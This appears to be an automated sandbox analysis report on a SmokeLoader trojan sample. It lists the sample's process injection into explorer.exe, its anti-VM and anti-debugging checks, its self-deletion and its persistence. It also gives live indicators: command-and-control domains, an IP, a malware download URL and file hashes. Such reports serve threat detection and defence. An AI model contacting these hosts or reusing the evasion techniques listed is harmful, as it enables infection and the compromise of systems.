            Source: C:\Users\user\AppData\Roaming\iaivaahProcess created: C:\Users\user\AppData\Roaming\iaivaah C:\Users\user\AppData\Roaming\iaivaahJump to behavior
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\iaivaahJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@6/2@3/1
            Source: cf71PGrIPQ.exeStatic PE information: More than 200 imports for KERNEL32.dll
            Source: cf71PGrIPQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: cf71PGrIPQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: cf71PGrIPQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: cf71PGrIPQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: cf71PGrIPQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: cf71PGrIPQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: cf71PGrIPQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\mavonopug\cexegu31\rehe takuruhizet\99\z.pdb source: cf71PGrIPQ.exe, iaivaah.13.dr
            Source: Binary string: VC:\mavonopug\cexegu31\rehe takuruhizet\99\z.pdbP+C source: cf71PGrIPQ.exe, iaivaah.13.dr
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeCode function: 6_2_00401880 push esi; iretd 6_2_00401893
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeCode function: 6_2_00402E94 push es; iretd 6_2_00402EA0
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeCode function: 6_1_00402E94 push es; iretd 6_1_00402EA0
            Source: C:\Users\user\AppData\Roaming\iaivaahCode function: 17_2_03283634 push es; iretd 17_2_03283640
            Source: C:\Users\user\AppData\Roaming\iaivaahCode function: 21_2_00401880 push esi; iretd 21_2_00401893
            Source: C:\Users\user\AppData\Roaming\iaivaahCode function: 21_2_00402E94 push es; iretd 21_2_00402EA0
            Source: C:\Users\user\AppData\Roaming\iaivaahCode function: 21_1_00402E94 push es; iretd 21_1_00402EA0
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeCode function: 1_2_00420070 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_00420070
            Source: initial sampleStatic PE information: section name: .text entropy: 7.03134441107
            Source: initial sampleStatic PE information: section name: .text entropy: 7.03134441107
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\iaivaahJump to dropped file
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\iaivaahJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Deletes itself after installation
            Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\cf71pgripq.exeJump to behavior
            Hides that the sample has been downloaded from the Internet (zone.identifier)
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\iaivaah:Zone.Identifier read attributes | deleteJump to behavior

            Malware Analysis System Evasion:

            barindex
            Checks if the current machine is a virtual machine (disk enumeration)
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\iaivaahKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\iaivaahKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\iaivaahKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\iaivaahKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\iaivaahKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\iaivaahKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Windows\explorer.exe TID: 7140Thread sleep count: 571 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 7152Thread sleep count: 368 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 7152Thread sleep time: -36800s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 7160Thread sleep count: 424 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 7160Thread sleep time: -42400s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 6780Thread sleep count: 463 > 30Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 571Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 368Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 424Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 463Jump to behavior
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeSystem information queried: ModuleInformationJump to behavior
            Source: explorer.exe, 0000000D.00000000.333687943.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000000D.00000000.306993482.000000000EF02000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}soft.Wi
            Source: explorer.exe, 0000000D.00000000.318537483.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
            Source: explorer.exe, 0000000D.00000000.333687943.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
            Source: explorer.exe, 0000000D.00000000.328908801.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000000D.00000000.328908801.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
            Source: explorer.exe, 0000000D.00000000.333687943.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

            Anti Debugging:

            barindex
            Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeSystem information queried: CodeIntegrityInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\iaivaahSystem information queried: CodeIntegrityInformationJump to behavior
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeCode function: 1_2_0041FE40 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0041FE40
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeCode function: 1_2_00420070 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_00420070
            Source: C:\Users\user\AppData\Roaming\iaivaahCode function: 17_2_03280042 push dword ptr fs:[00000030h]17_2_03280042
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Roaming\iaivaahProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Roaming\iaivaahCode function: 21_1_004027ED LdrLoadDll,21_1_004027ED
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeCode function: 1_2_0041FE40 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0041FE40
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeCode function: 1_2_0041DF00 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0041DF00

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE files
            Source: C:\Windows\explorer.exeFile created: iaivaah.13.drJump to dropped file
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exeDomain query: privacytoolzforyou-7000.com
            Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
            Source: C:\Users\user\AppData\Roaming\iaivaahSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\iaivaahSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\AppData\Roaming\iaivaahMemory written: C:\Users\user\AppData\Roaming\iaivaah base: 400000 value starts with: 4D5AJump to behavior
            Contains functionality to inject code into remote processes
            Source: C:\Users\user\AppData\Roaming\iaivaahCode function: 17_2_03280110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,17_2_03280110
            Creates a thread in another existing process (thread injection)
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeThread created: C:\Windows\explorer.exe EIP: 4DE1930Jump to behavior
            Source: C:\Users\user\AppData\Roaming\iaivaahThread created: unknown EIP: 5AC1930Jump to behavior
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeProcess created: C:\Users\user\Desktop\cf71PGrIPQ.exe "C:\Users\user\Desktop\cf71PGrIPQ.exe" Jump to behavior
            Source: C:\Users\user\AppData\Roaming\iaivaahProcess created: C:\Users\user\AppData\Roaming\iaivaah C:\Users\user\AppData\Roaming\iaivaahJump to behavior
            Source: explorer.exe, 0000000D.00000000.310917230.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000D.00000000.298771642.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000D.00000000.324809023.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
            Source: explorer.exe, 0000000D.00000000.312014984.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.325714174.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.298976779.00000000011E0000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 0000000D.00000000.312014984.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.325714174.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.328709611.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.298976779.00000000011E0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 0000000D.00000000.312014984.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.325714174.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.298976779.00000000011E0000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 0000000D.00000000.312014984.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.325714174.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000D.00000000.298976779.00000000011E0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 0000000D.00000000.303486608.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.334192624.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.318537483.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\Desktop\cf71PGrIPQ.exeCode function: 1_2_00417FA0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,1_2_00417FA0

            Stealing of Sensitive Information:

            barindex
            Yara detected SmokeLoader
            Source: Yara matchFile source: 0000000D.00000000.327763629.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.405322219.0000000000500000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.405829764.0000000002061000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.338557763.00000000004C0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.338606370.00000000004E1000.00000004.00020000.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected SmokeLoader
            Source: Yara matchFile source: 0000000D.00000000.327763629.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.405322219.0000000000500000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.405829764.0000000002061000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.338557763.00000000004C0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.338606370.00000000004E1000.00000004.00020000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsNative API1DLL Side-Loading1Process Injection512Masquerading11OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsExploitation for Client Execution1Boot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion12LSASS MemorySecurity Software Discovery321Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer13Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerVirtualization/Sandbox Evasion12SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Hidden Files and Directories1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol124SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Information Discovery4VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 529748 Sample: cf71PGrIPQ.exe Startdate: 28/11/2021 Architecture: WINDOWS Score: 100 30 Multi AV Scanner detection for domain / URL 2->30 32 Found malware configuration 2->32 34 Antivirus detection for URL or domain 2->34 36 4 other signatures 2->36 7 cf71PGrIPQ.exe 2->7         started        9 iaivaah 2->9         started        process3 signatures4 12 cf71PGrIPQ.exe 7->12         started        46 Multi AV Scanner detection for dropped file 9->46 48 Machine Learning detection for dropped file 9->48 50 Contains functionality to inject code into remote processes 9->50 52 Injects a PE file into a foreign processes 9->52 15 iaivaah 9->15         started        process5 signatures6 54 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 12->54 56 Maps a DLL or memory area into another process 12->56 58 Checks if the current machine is a virtual machine (disk enumeration) 12->58 17 explorer.exe 2 12->17 injected 60 Creates a thread in another existing process (thread injection) 15->60 process7 dnsIp8 26 privacytoolzforyou-7000.com 212.193.50.94, 49748, 49786, 49815 ASBAXETNRU Russian Federation 17->26 28 host-data-coin-11.com 17->28 22 C:\Users\user\AppData\Roaming\iaivaah, PE32 17->22 dropped 24 C:\Users\user\...\iaivaah:Zone.Identifier, ASCII 17->24 dropped 38 System process connects to network (likely due to code injection or exploit) 17->38 40 Benign windows process drops PE files 17->40 42 Deletes itself after installation 17->42 44 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->44 file9 signatures10

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            cf71PGrIPQ.exe33%VirustotalBrowse
            cf71PGrIPQ.exe48%ReversingLabsWin32.Trojan.CrypterX
            cf71PGrIPQ.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\iaivaah100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\iaivaah48%ReversingLabsWin32.Trojan.CrypterX

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            6.2.cf71PGrIPQ.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            21.2.iaivaah.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            6.0.cf71PGrIPQ.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            6.1.cf71PGrIPQ.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            21.0.iaivaah.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            6.0.cf71PGrIPQ.exe.400000.1.unpack100%AviraHEUR/AGEN.1126869Download File
            6.0.cf71PGrIPQ.exe.400000.0.unpack100%AviraHEUR/AGEN.1126869Download File
            21.1.iaivaah.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            21.0.iaivaah.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            1.2.cf71PGrIPQ.exe.33215a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            21.0.iaivaah.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            17.2.iaivaah.32815a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            6.0.cf71PGrIPQ.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            6.0.cf71PGrIPQ.exe.400000.2.unpack100%AviraHEUR/AGEN.1126869Download File
            6.0.cf71PGrIPQ.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            6.0.cf71PGrIPQ.exe.400000.3.unpack100%AviraHEUR/AGEN.1126869Download File

            Domains

            SourceDetectionScannerLabelLink
            host-data-coin-11.com3%VirustotalBrowse
            privacytoolzforyou-7000.com5%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://host-data-coin-11.com/3%VirustotalBrowse
            http://host-data-coin-11.com/0%Avira URL Cloudsafe
            http://file-coin-host-12.com/4%VirustotalBrowse
            http://file-coin-host-12.com/0%Avira URL Cloudsafe
            http://privacytoolzforyou-7000.com/downloads/toolspab2.exe100%Avira URL Cloudmalware

            Domains and IPs

            Download Network PCAP: filteredfull

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            host-data-coin-11.com
            		212.193.50.94
            		truetrueunknown
            privacytoolzforyou-7000.com
            		212.193.50.94
            		truetrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://host-data-coin-11.com/true
            • 3%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://file-coin-host-12.com/true
            • 4%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://privacytoolzforyou-7000.com/downloads/toolspab2.exetrue
            • Avira URL Cloud: malware
            		unknown

            Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public

            IPDomainCountryFlagASNASN NameMalicious
            212.193.50.94
            		host-data-coin-11.comRussian Federation
            		49392ASBAXETNRUtrue

            General Information

            Joe Sandbox Version:34.0.0 Boulder Opal
            Analysis ID:529748
            Start date:28.11.2021
            Start time:05:07:09
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 5m 37s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:cf71PGrIPQ.exe
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:28
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:1
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@6/2@3/1
            EGA Information:Failed
            HDC Information:
            • Successful, ratio: 95.8% (good quality ratio 44.9%)
            • Quality average: 29.5%
            • Quality standard deviation: 35%
            HCA Information:Failed
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .exe
            Warnings:
            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
            • Excluded IPs from analysis (whitelisted): 23.211.4.86
            • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com
            • Not all processes where analyzed, report is missing behavior information

            Simulations

            TimeTypeDescription
            05:08:43Task SchedulerRun new task: Firefox Default Browser Agent 10B58E79CC339B93 path: C:\Users\user\AppData\Roaming\iaivaah

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            212.193.50.94Whg8jgqeOs.exeGet hashmaliciousBrowse
            • lacasadicavour.com/load3.exe
            ikeokicy4x.exeGet hashmaliciousBrowse
            • lacasadicavour.com/load3.exe

            Domains

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            host-data-coin-11.comwFSlY2rwOP.exeGet hashmaliciousBrowse
            • 45.8.127.19
            phuVfdLnVm.exeGet hashmaliciousBrowse
            • 45.8.127.19
            qJDQgtq7rJ.exeGet hashmaliciousBrowse
            • 45.8.127.19
            privacytoolzforyou-7000.comwFSlY2rwOP.exeGet hashmaliciousBrowse
            • 45.8.127.19
            phuVfdLnVm.exeGet hashmaliciousBrowse
            • 45.8.127.19
            qJDQgtq7rJ.exeGet hashmaliciousBrowse
            • 45.8.127.19
            23xboTzWGy.exeGet hashmaliciousBrowse
            • 212.192.241.249

            ASN

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            ASBAXETNRUscBGm2BQi3.rtfGet hashmaliciousBrowse
            • 212.193.51.49
            i9wanH88Pa.exeGet hashmaliciousBrowse
            • 45.139.179.232
            Ref 0180066743_pdf_______________________.exeGet hashmaliciousBrowse
            • 212.193.50.242
            uJ4Rs5evAk.exeGet hashmaliciousBrowse
            • 45.139.179.232
            8FylnxoGnp.exeGet hashmaliciousBrowse
            • 45.139.179.232
            Payment Advice Advice GLVA29879055 Priority .exeGet hashmaliciousBrowse
            • 212.193.50.242
            PO-0010A-HSG-210120.xlsxGet hashmaliciousBrowse
            • 212.193.50.242
            rNCRBgB7LC.exeGet hashmaliciousBrowse
            • 212.193.50.242
            Payment Advice Advice GLVA29879055 Priority .exeGet hashmaliciousBrowse
            • 212.193.50.242
            MGI07oGTIM.exeGet hashmaliciousBrowse
            • 212.193.50.242
            j030Ax9Cum.rtfGet hashmaliciousBrowse
            • 212.193.50.242
            KIttKh48Tw.exeGet hashmaliciousBrowse
            • 212.193.50.242
            e0oejnEdYa.exeGet hashmaliciousBrowse
            • 212.193.50.242
            ekZDWpGPTB.exeGet hashmaliciousBrowse
            • 45.139.179.232
            MV LILY SEA.xlsxGet hashmaliciousBrowse
            • 212.193.50.242
            VDI-QUOTATION-PAYMENT.xlsxGet hashmaliciousBrowse
            • 212.193.50.242
            Cotizaci#U00f3n_pdf_________________________________________________.exeGet hashmaliciousBrowse
            • 212.193.50.242
            Nota de aviso de pago del 25.11.2021.PDF.exeGet hashmaliciousBrowse
            • 212.193.50.242
            BP I-2111232.exeGet hashmaliciousBrowse
            • 212.193.50.242
            3E8869030B9C89B8C43E9F8A6730A516E3945AB1272E3.exeGet hashmaliciousBrowse
            • 212.193.50.242

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Roaming\iaivaah
            Process:C:\Windows\explorer.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):321024
            Entropy (8bit):5.571504370703933
            Encrypted:false
            SSDEEP:6144:bJhiMLzKtF+5t5CPqTTfMNqSXuZet0ygwcAzvzEgV2Lo:l93FQPqTTfSqSXuZet0ygwcKEgQL
            MD5:19B07BFA4BA4CFFBA03DFF47A9EFDF36
            SHA1:0629443D410C7EF3CDEC3528C257022F4700D062
            SHA-256:79C00DB1607B8F07618EE3F90F5C4E160C7DE05BCE6380A7DE83171E2EAC11D4
            SHA-512:38BA5CE878E41A4C52AB3E4F9A1399DE227E21AB11A94DE1F57640E6C5F3B6263A875F7C9F208640638C233E5084AB80F48D466203B598A466D437F6BE5E53D4
            Malicious:true
            Antivirus:
            • Antivirus: Joe Sandbox ML, Detection: 100%
